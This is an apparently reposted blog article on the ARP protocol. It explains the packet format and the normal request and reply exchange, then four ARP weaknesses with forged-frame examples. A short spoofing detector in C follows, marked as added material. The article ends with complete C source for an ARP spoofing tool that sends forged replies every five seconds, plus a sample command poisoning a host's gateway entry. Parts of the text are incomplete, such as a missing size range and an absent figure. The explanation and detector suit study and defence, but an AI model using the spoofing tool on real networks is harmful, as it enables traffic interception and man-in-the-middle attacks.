ARP principles and defects (with source code of ARP spoofing)

Source: Internet
Author: User

0 Introduction

An important reason the IP protocol is so widely used is that it can run over almost any link, such as point-to-point serial lines and FDDI ring networks; the most common link layer carrying IP is, of course, Ethernet. A point-to-point serial line has only two nodes, so there is no need to define physical addresses. On a broadcast network such as Ethernet, each node has a unique physical address.

A datagram generated by the IP layer must pass through the physical link layer to become a real physical signal. Where it should go is determined by the destination IP address, but the link layer knows nothing about IP addresses: it sends frames according to the destination MAC address. The target MAC address must therefore be known before an IP datagram can be sent, and the ARP protocol provides this function of finding the MAC address that corresponds to an IP address.

1 ARP packet format

The complete format of ARP datagram over Ethernet. The green area is the content of ARP. It must be noted that the size of the Ethernet data must be between and, while that of the ARP packet must be 28 bytes. Therefore, it must be filled with 18 bytes to meet the requirements.

The corresponding Ethernet frame type value of ARP is 0x0806.

In the ARP packet, the link layer address type is Ethernet, value 1; the network layer type is IP, value 0x800; the link layer address length is 6; and the network layer address length is 4. The op field distinguishes ARP requests from responses: 1 indicates a request and 2 indicates a response. The sender's Ethernet address is the MAC of the host that sends the ARP packet, and the sender IP address is the IP address of that host. The destination MAC address and destination IP address fields have the same meaning, except that they identify the receiver.

2 Normal ARP request and response process

The following is a discussion of op types.

The network topology is as follows:

 

Assume that host A does not know the MAC address of host B, so host A must send an ARP request. op = 1 indicates an ARP request. In the ARP packet the destination MAC address is unknown, so it is filled with 0x000000000000, and the destination IP address is 192.168.0.101.

The destination MAC address of the Ethernet frame must be the broadcast address 0xFFFFFFFFFFFF. The source MAC address of the Ethernet frame and the sender MAC address in the ARP packet are both the MAC address of host A, that is, 0xAAAAAAAAAAAA. The main fields are as follows:

Ethernet frame source MAC: 0xAAAAAAAAAAAA

Ethernet frame destination MAC: 0xFFFFFFFFFFFF

ARP op = 1

ARP initiator MAC: 0xAAAAAAAAAAAA

IP address of the ARP initiator: 192.168.0.100

ARP destination MAC: 0x000000000000

ARP destination IP address: 192.168.0.101

 

Because this is an Ethernet broadcast frame, every host on the switch other than the sender (and, if VLANs are in use, in the same VLAN) receives the frame and hands it to its ARP module. The ARP module examines the destination IP address in the ARP packet. The gateway finds that this address differs from its own IP address and simply discards the packet; host B finds that it matches its own IP address, so it sends an ARP reply to host A:

Ethernet frame source MAC: 0xBBBBBBBBBBBB

Ethernet frame destination MAC: 0xAAAAAAAAAAAA

ARP op = 2

ARP initiator MAC: 0xBBBBBBBBBBBB

IP address of the ARP initiator: 192.168.0.101

ARP destination MAC: 0xAAAAAAAAAAAA

ARP destination IP address: 192.168.0.100

This Ethernet frame is unicast, so only A receives it. A hands the frame to its ARP module, which extracts the IP address and MAC address of the ARP initiator (192.168.0.101, 0xBBBBBBBBBBBB) and stores them in the ARP cache.

3 ARP Defects

The above describes the normal case. ARP is not a secure protocol, however, and hosts can be spoofed with manually constructed ARP packets.

3.1 ARP requests and responses do not need to be paired

When a host receives an ARP response, it accepts it and updates its ARP cache regardless of whether it previously sent a request. As a result, a false ARP response can be sent to any host, for example:

Ethernet frame source MAC: 0xBBBBBBBBBBBB

Ethernet frame destination MAC: 0xAAAAAAAAAAAA

ARP op = 2

ARP initiator MAC: 0xBBBBBBBBBBBB

IP address of the ARP initiator: 192.168.0.1

ARP destination MAC: 0xAAAAAAAAAAAA

Here host B sends A a spoofed ARP response telling A that the MAC corresponding to the IP address 192.168.0.1 is that of host B. From then on, all Ethernet frames A sends to 192.168.0.1 go to host B.

More importantly, ARP does not check the destination MAC and IP addresses in the ARP packet.

3.2 ARP reply can also be broadcast

The reply packet described above is unicast, but a reply can also be broadcast, as shown below:

Ethernet frame source MAC: 0xBBBBBBBBBBBB

Ethernet frame destination MAC: 0xFFFFFFFFFFFF

ARP op = 2

ARP initiator MAC: 0xBBBBBBBBBBBB

IP address of the ARP initiator: 192.168.0.1

ARP destination MAC: 0xAAAAAAAAAAAA

In this case, every host on the network segment is deceived into believing that the gateway 192.168.0.1 is host B.

Experiments confirm that Windows XP is fooled by broadcast ARP replies while Windows 7 is not, although Windows 7 is still fooled by unicast replies.

3.3 The source MAC of the Ethernet frame can differ from the initiator MAC in the ARP packet

Normally the source MAC of the Ethernet frame is the same as the initiator MAC in the ARP packet. In practice, however, ARP relies on the initiator MAC in the ARP packet rather than the source MAC of the Ethernet frame, as follows:

Ethernet frame source MAC: 0xBBBBBBBBBBBB

Ethernet frame destination MAC: 0xFFFFFFFFFFFF

ARP op = 2

ARP initiator MAC: 0xCCCCCCCCCCCC

IP address of the ARP initiator: 192.168.0.1

ARP destination MAC: 0xAAAAAAAAAAAA

In this case, 192.168.0.1 is mapped to the MAC 0xCCCCCCCCCCCC, which can be any value.

3.4 The source MAC of an Ethernet frame can be arbitrary

This is not a problem with the ARP protocol but with the Ethernet card itself, as follows:

Ethernet frame source MAC: 0x888888888888

Ethernet frame destination MAC: 0xFFFFFFFFFFFF

ARP op = 2

ARP initiator MAC: 0xCCCCCCCCCCCC

IP address of the ARP initiator: 192.168.0.1

ARP destination MAC: 0xAAAAAAAAAAAA

In this case, the MAC address of the host that initiated the ARP spoofing cannot be found. Even if you know you have been spoofed, you do not know by whom.
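The frame layout of section 1 and the four defects of section 3 translate directly into passive checks a monitoring host can run on every frame it sees. The detector below is an added example, not code from the original article: the flag names, struct arp_monitor, arp_check and arp_frame are its own, and the pinned gateway MAC 0x111111111111 is a constructed value.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
enum { ARP_UNSOLICITED = 1,   /* 3.1: reply that answers no recorded request */
       ARP_BCAST_REPLY = 2,   /* 3.2: reply sent to the broadcast address */
       ARP_MAC_MISMATCH = 4,  /* 3.3/3.4: Ethernet source != ARP sender MAC */
       ARP_REBIND = 8,        /* pinned IP announced with a different MAC */
       ARP_MALFORMED = 16 };  /* flag names are this example's own */
struct arp_monitor {
    uint8_t gw_ip[4], gw_mac[6]; int pinned;  /* one trusted IP -> MAC binding */
    uint8_t asked[8][4]; int n_asked;         /* target IPs of requests seen */
};
/* EtherType, hardware type, protocol type, address lengths (section 1). */
static const uint8_t ARP_HDR[8] = {0x08, 0x06, 0x00, 0x01, 0x08, 0x00, 6, 4};

/* Inspect one Ethernet frame; returns 0 for clean or non-ARP traffic. */
int arp_check(struct arp_monitor *m, const uint8_t *f, size_t len)
{
    if (len < 14 || memcmp(f + 12, ARP_HDR, 2)) return 0;
    if (len < 42 || memcmp(f + 14, ARP_HDR + 2, 6) || f[20] || f[21] < 1 || f[21] > 2)
        return ARP_MALFORMED;
    const uint8_t *smac = f + 22, *sip = f + 28, *tip = f + 38;
    int i, flags = memcmp(f + 6, smac, 6) ? ARP_MAC_MISMATCH : 0;
    if (m->pinned && !memcmp(m->gw_ip, sip, 4) && memcmp(m->gw_mac, smac, 6))
        flags |= ARP_REBIND;
    if (f[21] == 1 && m->n_asked < 8) memcpy(m->asked[m->n_asked++], tip, 4);
    if (f[21] == 1) return flags;          /* request: target IP was recorded */
    if ((f[0] & f[1] & f[2] & f[3] & f[4] & f[5]) == 0xff) flags |= ARP_BCAST_REPLY;
    for (i = 0; i < m->n_asked && memcmp(m->asked[i], sip, 4); i++) ;
    if (i == m->n_asked) flags |= ARP_UNSOLICITED;
    else memmove(m->asked[i], m->asked[--m->n_asked], 4);  /* consume the request */
    return flags;
}

/* Constructed sample frame: MACs are one byte repeated, IPs are 192.168.0.x. */
void arp_frame(uint8_t *f, int edst, int esrc, int op, int smac, int sip, int tip)
{
    uint8_t ip[4] = {192, 168, 0, (uint8_t)sip};
    memset(f, edst, 6);               memset(f + 6, esrc, 6);   memcpy(f + 12, ARP_HDR, 8);
    f[20] = 0; f[21] = (uint8_t)op;   memset(f + 22, smac, 6);  memcpy(f + 28, ip, 4);
    memset(f + 32, 0, 6);             ip[3] = (uint8_t)tip;     memcpy(f + 38, ip, 4);
}

int main(void)
{
    struct arp_monitor m = {{192, 168, 0, 1}, {0x11, 0x11, 0x11, 0x11, 0x11, 0x11}, 1};
    uint8_t f[42];
    arp_frame(f, 0xFF, 0x88, 2, 0xCC, 1, 100);   /* frame from section 3.4 */
    printf("section 3.4 frame -> flags %d\n", arp_check(&m, f, sizeof f));
}
```

Legitimate gratuitous ARP announcements can also raise ARP_UNSOLICITED, so that flag alone is a signal to correlate; ARP_REBIND against a pinned gateway binding is the check that still fires when the forged frame keeps its Ethernet source and ARP sender MAC consistent.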

 

 

Source code of ARP spoofing:
 
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/* arp packet structure */
struct arp_packet
{
    unsigned char hard_type[2];
    unsigned char pro_type[2];
    unsigned char hard_len;
    unsigned char pro_len;
    unsigned char op[2];
    unsigned char mac_sender[6];
    unsigned char ip_sender[4];
    unsigned char mac_target[6];
    unsigned char ip_target[4];
} __attribute__((__packed__));

/* Ethernet packet structure */
struct ethernet_packet
{
    unsigned char mac_des[6];
    unsigned char mac_src[6];
    unsigned char frame_type[2];
    struct arp_packet arp;
    unsigned char pad[18];
} __attribute__((__packed__));

/* initialize arp: fixed header fields, op = 2 (reply), zero padding */
static void init_arp(struct ethernet_packet *ep)
{
    ep->frame_type[0] = 0x08;
    ep->frame_type[1] = 0x06;
    ep->arp.hard_type[0] = 0x00;
    ep->arp.hard_type[1] = 0x01;
    ep->arp.pro_type[0] = 0x08;
    ep->arp.pro_type[1] = 0x00;
    ep->arp.hard_len = 0x6;
    ep->arp.pro_len = 0x4;
    ep->arp.op[0] = 0x00;
    ep->arp.op[1] = 0x02;
    memset(ep->pad, 0, 18);
}

/* convert a hexadecimal character to its value; returns 0xFF if invalid */
static unsigned char ahex_to_num(char a)
{
    int num;
    if (a <= '9' && a >= '0') {
        num = a - 0x30;
    } else {
        a = a | 0x20; /* convert to lowercase letters */
        if (a <= 'f' && a >= 'a') {
            num = a - 'a' + 10;
        } else {
            num = 0xFF;
        }
    }
    return num;
}

/* change the MAC address string to a number
 * return value: 0 -- succeeded; others -- failed
 */
static int get_mac_from_asci(const char *a_mac, unsigned char h_mac[6])
{
    int i = 0;
    /* exactly 12 hex digits are required; also guards the reads below */
    if (strlen(a_mac) != 12) {
        printf("MAC address format: AABBCCDDEEFF\n");
        return -1;
    }
    for (i = 0; i < 12; i += 2) {
        unsigned char hi = ahex_to_num(a_mac[i]);
        unsigned char lo = ahex_to_num(a_mac[i + 1]);
        if (hi != 0xFF && lo != 0xFF) {
            h_mac[i / 2] = 16 * hi + lo;
        } else {
            printf("MAC address format: AABBCCDDEEFF\n");
            return -1;
        }
    }
    return 0;
}

/* construct arp, return value: 0 -- successful */
int build_arp(struct ethernet_packet *ep, char *e_mac_src, char *e_mac_des, char *arp_mac_send, char *arp_ip_send, char *arp_mac_tgt, char *arp_ip_tgt)
{
    init_arp(ep);
    struct in_addr inaddr;
    if (0 == inet_aton(arp_ip_tgt, &inaddr)) {
        printf("Destination IP address input error\n");
        return -1;
    }
    memcpy((void *)ep->arp.ip_target, (void *)&inaddr, 4);
    if (0 == inet_aton(arp_ip_send, &inaddr)) {
        printf("Initiator IP address input error\n");
        return -2;
    }
    memcpy((void *)ep->arp.ip_sender, (void *)&inaddr, 4);

    if (get_mac_from_asci(e_mac_src, ep->mac_src) ||
        get_mac_from_asci(e_mac_des, ep->mac_des) ||
        get_mac_from_asci(arp_mac_send, ep->arp.mac_sender) ||
        get_mac_from_asci(arp_mac_tgt, ep->arp.mac_target)) {
        printf("An error occurred while reading the MAC address\n");
        return -1;
    }
    return 0;
}

int main(int argc, char **argv)
{
    struct ethernet_packet ep;
    /* all six arguments are required */
    if (argc != 7 || build_arp(&ep, argv[1], argv[2], argv[3], argv[4], argv[5], argv[6])) {
        printf("Usage: marp mac_src mac_des mac_send ip_send mac_tgt ip_tgt\n");
        return -1;
    }
    printf("succeeded\n");

    /* SOCK_PACKET is the obsolete Linux packet interface; it needs root */
    int fd = socket(AF_INET, SOCK_PACKET, htons(0x0806));
    if (fd < 0) {
        perror("socket");
        exit(-1);
    }
    struct sockaddr sa;
    memset(&sa, 0, sizeof(sa));
    strcpy(sa.sa_data, "eth0"); /* outgoing interface name */
    while (1) {
        sendto(fd, &ep, sizeof(ep), 0, &sa, sizeof(sa));
        sleep(5);
    }
    close(fd);
    return 0;
}
 
 
The execution format is: marp <Ethernet frame source MAC> <Ethernet frame destination MAC> <ARP initiator MAC> <ARP initiator IP> <ARP destination MAC> <ARP destination IP>, for example:
./marp 000C29BEE91F ffffffffffff 000C29BEE91F 172.16.35.254 00016109c0fc 172.16.35.220


From the growth track of smstong
